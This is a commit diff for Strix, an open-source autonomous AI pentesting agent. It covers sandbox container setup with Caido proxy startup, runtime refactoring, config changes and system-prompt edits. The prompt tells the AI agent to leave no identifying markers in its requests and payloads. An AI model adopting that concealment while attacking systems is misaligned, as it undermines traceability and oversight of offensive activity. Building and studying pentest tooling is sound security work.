Compare commits
22 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
86f8835ccb | ||
|
|
2bfb80ff4a | ||
|
|
7ff0e68466 | ||
|
|
2ebfd20db5 | ||
|
|
918a151892 | ||
|
|
a80ecac7bd | ||
|
|
19246d8a5a | ||
|
|
4cb2cebd1e | ||
|
|
26b0786a4e | ||
|
|
61dea7010a | ||
|
|
c433d4ffb2 | ||
|
|
ed6861db64 | ||
|
|
a74ed69471 | ||
|
|
9102b22381 | ||
|
|
693ef16060 | ||
|
|
8dc6f1dc8f | ||
|
|
4d9154a7f8 | ||
|
|
2898db318e | ||
|
|
960bb91790 | ||
|
|
4de4be683f | ||
|
|
d351b14ae7 | ||
|
|
ceeec8faa8 |
@@ -251,7 +251,7 @@ Have questions? Found a bug? Want to contribute? **[Join our Discord!](https://d
|
||||
|
||||
## Acknowledgements
|
||||
|
||||
Strix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [ProjectDiscovery](https://github.com/projectdiscovery), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!
|
||||
Strix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [Nuclei](https://github.com/projectdiscovery/nuclei), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!
|
||||
|
||||
|
||||
> [!WARNING]
|
||||
|
||||
@@ -9,7 +9,8 @@ RUN apt-get update && \
|
||||
|
||||
RUN useradd -m -s /bin/bash pentester && \
|
||||
usermod -aG sudo pentester && \
|
||||
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
|
||||
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers && \
|
||||
touch /home/pentester/.hushlogin
|
||||
|
||||
RUN mkdir -p /home/pentester/configs \
|
||||
/home/pentester/wordlists \
|
||||
@@ -168,9 +169,12 @@ RUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt
|
||||
RUN echo "# Sandbox Environment" > README.md
|
||||
|
||||
COPY strix/__init__.py strix/
|
||||
COPY strix/config/ /app/strix/config/
|
||||
COPY strix/utils/ /app/strix/utils/
|
||||
COPY strix/telemetry/ /app/strix/telemetry/
|
||||
COPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/
|
||||
|
||||
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py /app/strix/tools/
|
||||
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py strix/tools/context.py /app/strix/tools/
|
||||
|
||||
COPY strix/tools/browser/ /app/strix/tools/browser/
|
||||
COPY strix/tools/file_edit/ /app/strix/tools/file_edit/
|
||||
|
||||
@@ -1,9 +1,12 @@
|
||||
#!/bin/bash
|
||||
set -e
|
||||
|
||||
if [ -z "$CAIDO_PORT" ]; then
|
||||
echo "Error: CAIDO_PORT must be set."
|
||||
exit 1
|
||||
CAIDO_PORT=48080
|
||||
CAIDO_LOG="/tmp/caido_startup.log"
|
||||
|
||||
if [ ! -f /app/certs/ca.p12 ]; then
|
||||
echo "ERROR: CA certificate file /app/certs/ca.p12 not found."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
|
||||
@@ -11,28 +14,62 @@ caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
|
||||
--no-logging \
|
||||
--no-open \
|
||||
--import-ca-cert /app/certs/ca.p12 \
|
||||
--import-ca-cert-pass "" > /dev/null 2>&1 &
|
||||
--import-ca-cert-pass "" > "$CAIDO_LOG" 2>&1 &
|
||||
|
||||
CAIDO_PID=$!
|
||||
echo "Started Caido with PID $CAIDO_PID on port $CAIDO_PORT"
|
||||
|
||||
echo "Waiting for Caido API to be ready..."
|
||||
CAIDO_READY=false
|
||||
for i in {1..30}; do
|
||||
if curl -s -o /dev/null http://localhost:${CAIDO_PORT}/graphql; then
|
||||
echo "Caido API is ready."
|
||||
if ! kill -0 $CAIDO_PID 2>/dev/null; then
|
||||
echo "ERROR: Caido process died while waiting for API (iteration $i)."
|
||||
echo "=== Caido log ==="
|
||||
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if curl -s -o /dev/null -w "%{http_code}" http://localhost:${CAIDO_PORT}/graphql/ | grep -qE "^(200|400)$"; then
|
||||
echo "Caido API is ready (attempt $i)."
|
||||
CAIDO_READY=true
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
|
||||
if [ "$CAIDO_READY" = false ]; then
|
||||
echo "ERROR: Caido API did not become ready within 30 seconds."
|
||||
echo "Caido process status: $(kill -0 $CAIDO_PID 2>&1 && echo 'running' || echo 'dead')"
|
||||
echo "=== Caido log ==="
|
||||
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
sleep 2
|
||||
|
||||
echo "Fetching API token..."
|
||||
TOKEN=$(curl -s -X POST \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
|
||||
http://localhost:${CAIDO_PORT}/graphql | jq -r '.data.loginAsGuest.token.accessToken')
|
||||
TOKEN=""
|
||||
for attempt in 1 2 3 4 5; do
|
||||
RESPONSE=$(curl -sL -X POST \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
|
||||
http://localhost:${CAIDO_PORT}/graphql)
|
||||
|
||||
TOKEN=$(echo "$RESPONSE" | jq -r '.data.loginAsGuest.token.accessToken // empty')
|
||||
|
||||
if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ]; then
|
||||
echo "Successfully obtained API token (attempt $attempt)."
|
||||
break
|
||||
fi
|
||||
|
||||
echo "Token fetch attempt $attempt failed: $RESPONSE"
|
||||
sleep $((attempt * 2))
|
||||
done
|
||||
|
||||
if [ -z "$TOKEN" ] || [ "$TOKEN" == "null" ]; then
|
||||
echo "Failed to get API token from Caido."
|
||||
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"mutation { loginAsGuest { token { accessToken } } }"}' http://localhost:${CAIDO_PORT}/graphql
|
||||
echo "ERROR: Failed to get API token from Caido after 5 attempts."
|
||||
echo "=== Caido log ==="
|
||||
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
@@ -40,7 +77,7 @@ export CAIDO_API_TOKEN=$TOKEN
|
||||
echo "Caido API token has been set."
|
||||
|
||||
echo "Creating a new Caido project..."
|
||||
CREATE_PROJECT_RESPONSE=$(curl -s -X POST \
|
||||
CREATE_PROJECT_RESPONSE=$(curl -sL -X POST \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-d '{"query":"mutation CreateProject { createProject(input: {name: \"sandbox\", temporary: true}) { project { id } } }"}' \
|
||||
@@ -57,7 +94,7 @@ fi
|
||||
echo "Caido project created with ID: $PROJECT_ID"
|
||||
|
||||
echo "Selecting Caido project..."
|
||||
SELECT_RESPONSE=$(curl -s -X POST \
|
||||
SELECT_RESPONSE=$(curl -sL -X POST \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-d '{"query":"mutation SelectProject { selectProject(id: \"'$PROJECT_ID'\") { currentProject { project { id } } } }"}' \
|
||||
@@ -114,9 +151,36 @@ sudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password
|
||||
sudo -u pentester certutil -A -n "Testing Root CA" -t "C,," -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb
|
||||
echo "✅ CA added to browser trust store"
|
||||
|
||||
echo "Container initialization complete - agents will start their own tool servers as needed"
|
||||
echo "✅ Shared container ready for multi-agent use"
|
||||
echo "Starting tool server..."
|
||||
cd /app
|
||||
export PYTHONPATH=/app
|
||||
export STRIX_SANDBOX_MODE=true
|
||||
export POETRY_VIRTUALENVS_CREATE=false
|
||||
export TOOL_SERVER_TIMEOUT="${STRIX_SANDBOX_EXECUTION_TIMEOUT:-120}"
|
||||
TOOL_SERVER_LOG="/tmp/tool_server.log"
|
||||
|
||||
sudo -E -u pentester \
|
||||
poetry run python -m strix.runtime.tool_server \
|
||||
--token="$TOOL_SERVER_TOKEN" \
|
||||
--host=0.0.0.0 \
|
||||
--port="$TOOL_SERVER_PORT" \
|
||||
--timeout="$TOOL_SERVER_TIMEOUT" > "$TOOL_SERVER_LOG" 2>&1 &
|
||||
|
||||
for i in {1..10}; do
|
||||
if curl -s "http://127.0.0.1:$TOOL_SERVER_PORT/health" | grep -q '"status":"healthy"'; then
|
||||
echo "✅ Tool server healthy on port $TOOL_SERVER_PORT"
|
||||
break
|
||||
fi
|
||||
if [ $i -eq 10 ]; then
|
||||
echo "ERROR: Tool server failed to become healthy"
|
||||
echo "=== Tool server log ==="
|
||||
cat "$TOOL_SERVER_LOG" 2>/dev/null || echo "(no log)"
|
||||
exit 1
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
|
||||
echo "✅ Container ready"
|
||||
|
||||
cd /workspace
|
||||
|
||||
exec "$@"
|
||||
|
||||
9
poetry.lock
generated
9
poetry.lock
generated
@@ -4856,15 +4856,14 @@ files = [
|
||||
|
||||
[[package]]
|
||||
name = "pyasn1"
|
||||
version = "0.6.1"
|
||||
version = "0.6.2"
|
||||
description = "Pure-Python implementation of ASN.1 types and DER/BER/CER codecs (X.208)"
|
||||
optional = true
|
||||
optional = false
|
||||
python-versions = ">=3.8"
|
||||
groups = ["main"]
|
||||
markers = "extra == \"vertex\""
|
||||
files = [
|
||||
{file = "pyasn1-0.6.1-py3-none-any.whl", hash = "sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629"},
|
||||
{file = "pyasn1-0.6.1.tar.gz", hash = "sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034"},
|
||||
{file = "pyasn1-0.6.2-py3-none-any.whl", hash = "sha256:1eb26d860996a18e9b6ed05e7aae0e9fc21619fcee6af91cca9bad4fbea224bf"},
|
||||
{file = "pyasn1-0.6.2.tar.gz", hash = "sha256:9b59a2b25ba7e4f8197db7686c09fb33e658b98339fadb826e9512629017833b"},
|
||||
]
|
||||
|
||||
[[package]]
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
[tool.poetry]
|
||||
name = "strix-agent"
|
||||
version = "0.6.1"
|
||||
version = "0.6.2"
|
||||
description = "Open-source AI Hackers for your apps"
|
||||
authors = ["Strix <hi@usestrix.com>"]
|
||||
readme = "README.md"
|
||||
|
||||
@@ -4,7 +4,7 @@ set -euo pipefail
|
||||
|
||||
APP=strix
|
||||
REPO="usestrix/strix"
|
||||
STRIX_IMAGE="ghcr.io/usestrix/strix-sandbox:0.1.10"
|
||||
STRIX_IMAGE="ghcr.io/usestrix/strix-sandbox:0.1.11"
|
||||
|
||||
MUTED='\033[0;2m'
|
||||
RED='\033[0;31m'
|
||||
|
||||
@@ -16,9 +16,9 @@ CLI OUTPUT:
|
||||
- NEVER use "Strix" or any identifiable names/markers in HTTP requests, payloads, user-agents, or any inputs
|
||||
|
||||
INTER-AGENT MESSAGES:
|
||||
- NEVER echo inter_agent_message or agent_completion_report XML content that is sent to you in your output.
|
||||
- Process these internally without displaying the XML
|
||||
- NEVER echo agent_identity XML blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.
|
||||
- NEVER echo inter_agent_message or agent_completion_report blocks that are sent to you in your output.
|
||||
- Process these internally without displaying them
|
||||
- NEVER echo agent_identity blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.
|
||||
- Minimize inter-agent messaging: only message when essential for coordination or assistance; avoid routine status updates; batch non-urgent information; prefer parent/child completion flows and shared artifacts over messaging
|
||||
|
||||
AUTONOMOUS BEHAVIOR:
|
||||
@@ -301,7 +301,7 @@ PERSISTENCE IS MANDATORY:
|
||||
</multi_agent_system>
|
||||
|
||||
<tool_usage>
|
||||
Tool calls use XML format:
|
||||
Tool call format:
|
||||
<function=tool_name>
|
||||
<parameter=param_name>value</parameter>
|
||||
</function>
|
||||
@@ -311,8 +311,8 @@ CRITICAL RULES:
|
||||
1. Exactly one tool call per message — never include more than one <function>...</function> block in a single LLM message.
|
||||
2. Tool call must be last in message
|
||||
3. EVERY tool call MUST end with </function>. This is MANDATORY. Never omit the closing tag. End your response immediately after </function>.
|
||||
4. Use ONLY the exact XML format shown above. NEVER use JSON/YAML/INI or any other syntax for tools or parameters.
|
||||
5. When sending ANY multi-line content in tool parameters, use real newlines (actual line breaks). Do NOT emit literal "\n" sequences. If you send "\n" instead of real line breaks inside the XML parameter value, tools may fail or behave incorrectly.
|
||||
4. Use ONLY the exact format shown above. NEVER use JSON/YAML/INI or any other syntax for tools or parameters.
|
||||
5. When sending ANY multi-line content in tool parameters, use real newlines (actual line breaks). Do NOT emit literal "\n" sequences. Literal "\n" instead of real line breaks will cause tools to fail.
|
||||
6. Tool names must match exactly the tool "name" defined (no module prefixes, dots, or variants).
|
||||
- Correct: <function=think> ... </function>
|
||||
- Incorrect: <thinking_tools.think> ... </function>
|
||||
|
||||
@@ -19,13 +19,25 @@ class Config:
|
||||
strix_llm_max_retries = "5"
|
||||
strix_memory_compressor_timeout = "30"
|
||||
llm_timeout = "300"
|
||||
_LLM_CANONICAL_NAMES = (
|
||||
"strix_llm",
|
||||
"llm_api_key",
|
||||
"llm_api_base",
|
||||
"openai_api_base",
|
||||
"litellm_base_url",
|
||||
"ollama_api_base",
|
||||
"strix_reasoning_effort",
|
||||
"strix_llm_max_retries",
|
||||
"strix_memory_compressor_timeout",
|
||||
"llm_timeout",
|
||||
)
|
||||
|
||||
# Tool & Feature Configuration
|
||||
perplexity_api_key = None
|
||||
strix_disable_browser = "false"
|
||||
|
||||
# Runtime Configuration
|
||||
strix_image = "ghcr.io/usestrix/strix-sandbox:0.1.10"
|
||||
strix_image = "ghcr.io/usestrix/strix-sandbox:0.1.11"
|
||||
strix_runtime_backend = "docker"
|
||||
strix_sandbox_execution_timeout = "120"
|
||||
strix_sandbox_connect_timeout = "10"
|
||||
@@ -45,6 +57,20 @@ class Config:
|
||||
def tracked_vars(cls) -> list[str]:
|
||||
return [name.upper() for name in cls._tracked_names()]
|
||||
|
||||
@classmethod
|
||||
def _llm_env_vars(cls) -> set[str]:
|
||||
return {name.upper() for name in cls._LLM_CANONICAL_NAMES}
|
||||
|
||||
@classmethod
|
||||
def _llm_env_changed(cls, saved_env: dict[str, Any]) -> bool:
|
||||
for var_name in cls._llm_env_vars():
|
||||
current = os.getenv(var_name)
|
||||
if current is None:
|
||||
continue
|
||||
if saved_env.get(var_name) != current:
|
||||
return True
|
||||
return False
|
||||
|
||||
@classmethod
|
||||
def get(cls, name: str) -> str | None:
|
||||
env_name = name.upper()
|
||||
@@ -88,10 +114,25 @@ class Config:
|
||||
def apply_saved(cls) -> dict[str, str]:
|
||||
saved = cls.load()
|
||||
env_vars = saved.get("env", {})
|
||||
if not isinstance(env_vars, dict):
|
||||
env_vars = {}
|
||||
cleared_vars = {
|
||||
var_name
|
||||
for var_name in cls.tracked_vars()
|
||||
if var_name in os.environ and os.environ.get(var_name) == ""
|
||||
}
|
||||
if cleared_vars:
|
||||
for var_name in cleared_vars:
|
||||
env_vars.pop(var_name, None)
|
||||
cls.save({"env": env_vars})
|
||||
if cls._llm_env_changed(env_vars):
|
||||
for var_name in cls._llm_env_vars():
|
||||
env_vars.pop(var_name, None)
|
||||
cls.save({"env": env_vars})
|
||||
applied = {}
|
||||
|
||||
for var_name, var_value in env_vars.items():
|
||||
if var_name in cls.tracked_vars() and not os.getenv(var_name):
|
||||
if var_name in cls.tracked_vars() and var_name not in os.environ:
|
||||
os.environ[var_name] = var_value
|
||||
applied[var_name] = var_value
|
||||
|
||||
|
||||
@@ -112,22 +112,13 @@ class PythonRenderer(BaseToolRenderer):
|
||||
return
|
||||
|
||||
stdout = result.get("stdout", "")
|
||||
stderr = result.get("stderr", "")
|
||||
|
||||
stdout = cls._clean_output(stdout) if stdout else ""
|
||||
stderr = cls._clean_output(stderr) if stderr else ""
|
||||
|
||||
if stdout:
|
||||
text.append("\n")
|
||||
formatted_output = cls._format_output(stdout)
|
||||
text.append_text(formatted_output)
|
||||
|
||||
if stderr:
|
||||
text.append("\n")
|
||||
text.append(" stderr: ", style="bold #ef4444")
|
||||
formatted_stderr = cls._format_output(stderr)
|
||||
text.append_text(formatted_stderr)
|
||||
|
||||
@classmethod
|
||||
def render(cls, tool_data: dict[str, Any]) -> Static:
|
||||
args = tool_data.get("args", {})
|
||||
|
||||
@@ -180,7 +180,6 @@ def check_duplicate(
|
||||
"model": model_name,
|
||||
"messages": messages,
|
||||
"timeout": 120,
|
||||
"temperature": 0,
|
||||
}
|
||||
if api_key:
|
||||
completion_kwargs["api_key"] = api_key
|
||||
|
||||
@@ -1,15 +1,13 @@
|
||||
import contextlib
|
||||
import logging
|
||||
import os
|
||||
import secrets
|
||||
import socket
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from concurrent.futures import TimeoutError as FuturesTimeoutError
|
||||
from pathlib import Path
|
||||
from typing import Any, cast
|
||||
from typing import cast
|
||||
|
||||
import docker
|
||||
import httpx
|
||||
from docker.errors import DockerException, ImageNotFound, NotFound
|
||||
from docker.models.containers import Container
|
||||
from requests.exceptions import ConnectionError as RequestsConnectionError
|
||||
@@ -22,10 +20,8 @@ from .runtime import AbstractRuntime, SandboxInfo
|
||||
|
||||
|
||||
HOST_GATEWAY_HOSTNAME = "host.docker.internal"
|
||||
DOCKER_TIMEOUT = 60 # seconds
|
||||
TOOL_SERVER_HEALTH_REQUEST_TIMEOUT = 5 # seconds per health check request
|
||||
TOOL_SERVER_HEALTH_RETRIES = 10 # number of retries for health check
|
||||
logger = logging.getLogger(__name__)
|
||||
DOCKER_TIMEOUT = 60
|
||||
CONTAINER_TOOL_SERVER_PORT = 48081
|
||||
|
||||
|
||||
class DockerRuntime(AbstractRuntime):
|
||||
@@ -33,50 +29,20 @@ class DockerRuntime(AbstractRuntime):
|
||||
try:
|
||||
self.client = docker.from_env(timeout=DOCKER_TIMEOUT)
|
||||
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
|
||||
logger.exception("Failed to connect to Docker daemon")
|
||||
if isinstance(e, RequestsConnectionError | RequestsTimeout):
|
||||
raise SandboxInitializationError(
|
||||
"Docker daemon unresponsive",
|
||||
f"Connection timed out after {DOCKER_TIMEOUT} seconds. "
|
||||
"Please ensure Docker Desktop is installed and running, "
|
||||
"and try running strix again.",
|
||||
) from e
|
||||
raise SandboxInitializationError(
|
||||
"Docker is not available",
|
||||
"Docker is not available or not configured correctly. "
|
||||
"Please ensure Docker Desktop is installed and running, "
|
||||
"and try running strix again.",
|
||||
"Please ensure Docker Desktop is installed and running.",
|
||||
) from e
|
||||
|
||||
self._scan_container: Container | None = None
|
||||
self._tool_server_port: int | None = None
|
||||
self._tool_server_token: str | None = None
|
||||
|
||||
def _generate_sandbox_token(self) -> str:
|
||||
return secrets.token_urlsafe(32)
|
||||
|
||||
def _find_available_port(self) -> int:
|
||||
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||
s.bind(("", 0))
|
||||
return cast("int", s.getsockname()[1])
|
||||
|
||||
def _exec_run_with_timeout(
|
||||
self, container: Container, cmd: str, timeout: int = DOCKER_TIMEOUT, **kwargs: Any
|
||||
) -> Any:
|
||||
with ThreadPoolExecutor(max_workers=1) as executor:
|
||||
future = executor.submit(container.exec_run, cmd, **kwargs)
|
||||
try:
|
||||
return future.result(timeout=timeout)
|
||||
except FuturesTimeoutError:
|
||||
logger.exception(f"exec_run timed out after {timeout}s: {cmd[:100]}...")
|
||||
raise SandboxInitializationError(
|
||||
"Container command timed out",
|
||||
f"Command timed out after {timeout} seconds. "
|
||||
"Docker may be overloaded or unresponsive. "
|
||||
"Please ensure Docker Desktop is installed and running, "
|
||||
"and try running strix again.",
|
||||
) from None
|
||||
|
||||
def _get_scan_id(self, agent_id: str) -> str:
|
||||
try:
|
||||
from strix.telemetry.tracer import get_global_tracer
|
||||
@@ -84,129 +50,118 @@ class DockerRuntime(AbstractRuntime):
|
||||
tracer = get_global_tracer()
|
||||
if tracer and tracer.scan_config:
|
||||
return str(tracer.scan_config.get("scan_id", "default-scan"))
|
||||
except ImportError:
|
||||
logger.debug("Failed to import tracer, using fallback scan ID")
|
||||
except AttributeError:
|
||||
logger.debug("Tracer missing scan_config, using fallback scan ID")
|
||||
|
||||
except (ImportError, AttributeError):
|
||||
pass
|
||||
return f"scan-{agent_id.split('-')[0]}"
|
||||
|
||||
def _verify_image_available(self, image_name: str, max_retries: int = 3) -> None:
|
||||
def _validate_image(image: docker.models.images.Image) -> None:
|
||||
if not image.id or not image.attrs:
|
||||
raise ImageNotFound(f"Image {image_name} metadata incomplete")
|
||||
|
||||
for attempt in range(max_retries):
|
||||
try:
|
||||
image = self.client.images.get(image_name)
|
||||
_validate_image(image)
|
||||
except ImageNotFound:
|
||||
if not image.id or not image.attrs:
|
||||
raise ImageNotFound(f"Image {image_name} metadata incomplete") # noqa: TRY301
|
||||
except (ImageNotFound, DockerException):
|
||||
if attempt == max_retries - 1:
|
||||
logger.exception(f"Image {image_name} not found after {max_retries} attempts")
|
||||
raise
|
||||
logger.warning(f"Image {image_name} not ready, attempt {attempt + 1}/{max_retries}")
|
||||
time.sleep(2**attempt)
|
||||
except DockerException:
|
||||
if attempt == max_retries - 1:
|
||||
logger.exception(f"Failed to verify image {image_name}")
|
||||
raise
|
||||
logger.warning(f"Docker error verifying image, attempt {attempt + 1}/{max_retries}")
|
||||
time.sleep(2**attempt)
|
||||
else:
|
||||
logger.debug(f"Image {image_name} verified as available")
|
||||
return
|
||||
|
||||
def _create_container_with_retry(self, scan_id: str, max_retries: int = 3) -> Container:
|
||||
last_exception = None
|
||||
def _recover_container_state(self, container: Container) -> None:
|
||||
for env_var in container.attrs["Config"]["Env"]:
|
||||
if env_var.startswith("TOOL_SERVER_TOKEN="):
|
||||
self._tool_server_token = env_var.split("=", 1)[1]
|
||||
break
|
||||
|
||||
port_bindings = container.attrs.get("NetworkSettings", {}).get("Ports", {})
|
||||
port_key = f"{CONTAINER_TOOL_SERVER_PORT}/tcp"
|
||||
if port_bindings.get(port_key):
|
||||
self._tool_server_port = int(port_bindings[port_key][0]["HostPort"])
|
||||
|
||||
def _wait_for_tool_server(self, max_retries: int = 30, timeout: int = 5) -> None:
|
||||
host = self._resolve_docker_host()
|
||||
health_url = f"http://{host}:{self._tool_server_port}/health"
|
||||
|
||||
time.sleep(5)
|
||||
|
||||
for attempt in range(max_retries):
|
||||
try:
|
||||
with httpx.Client(trust_env=False, timeout=timeout) as client:
|
||||
response = client.get(health_url)
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
if data.get("status") == "healthy":
|
||||
return
|
||||
except (httpx.ConnectError, httpx.TimeoutException, httpx.RequestError):
|
||||
pass
|
||||
|
||||
time.sleep(min(2**attempt * 0.5, 5))
|
||||
|
||||
raise SandboxInitializationError(
|
||||
"Tool server failed to start",
|
||||
"Container initialization timed out. Please try again.",
|
||||
)
|
||||
|
||||
def _create_container(self, scan_id: str, max_retries: int = 2) -> Container:
|
||||
container_name = f"strix-scan-{scan_id}"
|
||||
image_name = Config.get("strix_image")
|
||||
if not image_name:
|
||||
raise ValueError("STRIX_IMAGE must be configured")
|
||||
|
||||
for attempt in range(max_retries):
|
||||
self._verify_image_available(image_name)
|
||||
|
||||
last_error: Exception | None = None
|
||||
for attempt in range(max_retries + 1):
|
||||
try:
|
||||
self._verify_image_available(image_name)
|
||||
|
||||
try:
|
||||
existing_container = self.client.containers.get(container_name)
|
||||
logger.warning(f"Container {container_name} already exists, removing it")
|
||||
with contextlib.suppress(NotFound):
|
||||
existing = self.client.containers.get(container_name)
|
||||
with contextlib.suppress(Exception):
|
||||
existing_container.stop(timeout=5)
|
||||
existing_container.remove(force=True)
|
||||
existing.stop(timeout=5)
|
||||
existing.remove(force=True)
|
||||
time.sleep(1)
|
||||
except NotFound:
|
||||
pass
|
||||
except DockerException as e:
|
||||
logger.warning(f"Error checking/removing existing container: {e}")
|
||||
|
||||
caido_port = self._find_available_port()
|
||||
tool_server_port = self._find_available_port()
|
||||
tool_server_token = self._generate_sandbox_token()
|
||||
|
||||
self._tool_server_port = tool_server_port
|
||||
self._tool_server_token = tool_server_token
|
||||
self._tool_server_port = self._find_available_port()
|
||||
self._tool_server_token = secrets.token_urlsafe(32)
|
||||
execution_timeout = Config.get("strix_sandbox_execution_timeout") or "120"
|
||||
|
||||
container = self.client.containers.run(
|
||||
image_name,
|
||||
command="sleep infinity",
|
||||
detach=True,
|
||||
name=container_name,
|
||||
hostname=f"strix-scan-{scan_id}",
|
||||
ports={
|
||||
f"{caido_port}/tcp": caido_port,
|
||||
f"{tool_server_port}/tcp": tool_server_port,
|
||||
},
|
||||
hostname=container_name,
|
||||
ports={f"{CONTAINER_TOOL_SERVER_PORT}/tcp": self._tool_server_port},
|
||||
cap_add=["NET_ADMIN", "NET_RAW"],
|
||||
labels={"strix-scan-id": scan_id},
|
||||
environment={
|
||||
"PYTHONUNBUFFERED": "1",
|
||||
"CAIDO_PORT": str(caido_port),
|
||||
"TOOL_SERVER_PORT": str(tool_server_port),
|
||||
"TOOL_SERVER_TOKEN": tool_server_token,
|
||||
"TOOL_SERVER_PORT": str(CONTAINER_TOOL_SERVER_PORT),
|
||||
"TOOL_SERVER_TOKEN": self._tool_server_token,
|
||||
"STRIX_SANDBOX_EXECUTION_TIMEOUT": str(execution_timeout),
|
||||
"HOST_GATEWAY": HOST_GATEWAY_HOSTNAME,
|
||||
},
|
||||
extra_hosts=self._get_extra_hosts(),
|
||||
extra_hosts={HOST_GATEWAY_HOSTNAME: "host-gateway"},
|
||||
tty=True,
|
||||
)
|
||||
|
||||
self._scan_container = container
|
||||
logger.info("Created container %s for scan %s", container.id, scan_id)
|
||||
self._wait_for_tool_server()
|
||||
|
||||
self._initialize_container(
|
||||
container, caido_port, tool_server_port, tool_server_token
|
||||
)
|
||||
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
|
||||
last_exception = e
|
||||
if attempt == max_retries - 1:
|
||||
logger.exception(f"Failed to create container after {max_retries} attempts")
|
||||
break
|
||||
|
||||
logger.warning(f"Container creation attempt {attempt + 1}/{max_retries} failed")
|
||||
|
||||
self._tool_server_port = None
|
||||
self._tool_server_token = None
|
||||
|
||||
sleep_time = (2**attempt) + (0.1 * attempt)
|
||||
time.sleep(sleep_time)
|
||||
last_error = e
|
||||
if attempt < max_retries:
|
||||
self._tool_server_port = None
|
||||
self._tool_server_token = None
|
||||
time.sleep(2**attempt)
|
||||
else:
|
||||
return container
|
||||
|
||||
if isinstance(last_exception, RequestsConnectionError | RequestsTimeout):
|
||||
raise SandboxInitializationError(
|
||||
"Failed to create sandbox container",
|
||||
f"Docker daemon unresponsive after {max_retries} attempts "
|
||||
f"(timed out after {DOCKER_TIMEOUT}s). "
|
||||
"Please ensure Docker Desktop is installed and running, "
|
||||
"and try running strix again.",
|
||||
) from last_exception
|
||||
raise SandboxInitializationError(
|
||||
"Failed to create sandbox container",
|
||||
f"Container creation failed after {max_retries} attempts: {last_exception}. "
|
||||
"Please ensure Docker Desktop is installed and running, "
|
||||
"and try running strix again.",
|
||||
) from last_exception
|
||||
"Failed to create container",
|
||||
f"Container creation failed after {max_retries + 1} attempts: {last_error}",
|
||||
) from last_error
|
||||
|
||||
def _get_or_create_scan_container(self, scan_id: str) -> Container: # noqa: PLR0912
|
||||
def _get_or_create_container(self, scan_id: str) -> Container:
|
||||
container_name = f"strix-scan-{scan_id}"
|
||||
|
||||
if self._scan_container:
|
||||
@@ -223,33 +178,14 @@ class DockerRuntime(AbstractRuntime):
|
||||
container = self.client.containers.get(container_name)
|
||||
container.reload()
|
||||
|
||||
if (
|
||||
"strix-scan-id" not in container.labels
|
||||
or container.labels["strix-scan-id"] != scan_id
|
||||
):
|
||||
logger.warning(
|
||||
f"Container {container_name} exists but missing/wrong label, updating"
|
||||
)
|
||||
|
||||
if container.status != "running":
|
||||
logger.info(f"Starting existing container {container_name}")
|
||||
container.start()
|
||||
time.sleep(2)
|
||||
|
||||
self._scan_container = container
|
||||
|
||||
for env_var in container.attrs["Config"]["Env"]:
|
||||
if env_var.startswith("TOOL_SERVER_PORT="):
|
||||
self._tool_server_port = int(env_var.split("=")[1])
|
||||
elif env_var.startswith("TOOL_SERVER_TOKEN="):
|
||||
self._tool_server_token = env_var.split("=")[1]
|
||||
|
||||
logger.info(f"Reusing existing container {container_name}")
|
||||
|
||||
self._recover_container_state(container)
|
||||
except NotFound:
|
||||
pass
|
||||
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
|
||||
logger.warning(f"Failed to get container by name {container_name}: {e}")
|
||||
else:
|
||||
return container
|
||||
|
||||
@@ -262,101 +198,14 @@ class DockerRuntime(AbstractRuntime):
|
||||
if container.status != "running":
|
||||
container.start()
|
||||
time.sleep(2)
|
||||
|
||||
self._scan_container = container
|
||||
|
||||
for env_var in container.attrs["Config"]["Env"]:
|
||||
if env_var.startswith("TOOL_SERVER_PORT="):
|
||||
self._tool_server_port = int(env_var.split("=")[1])
|
||||
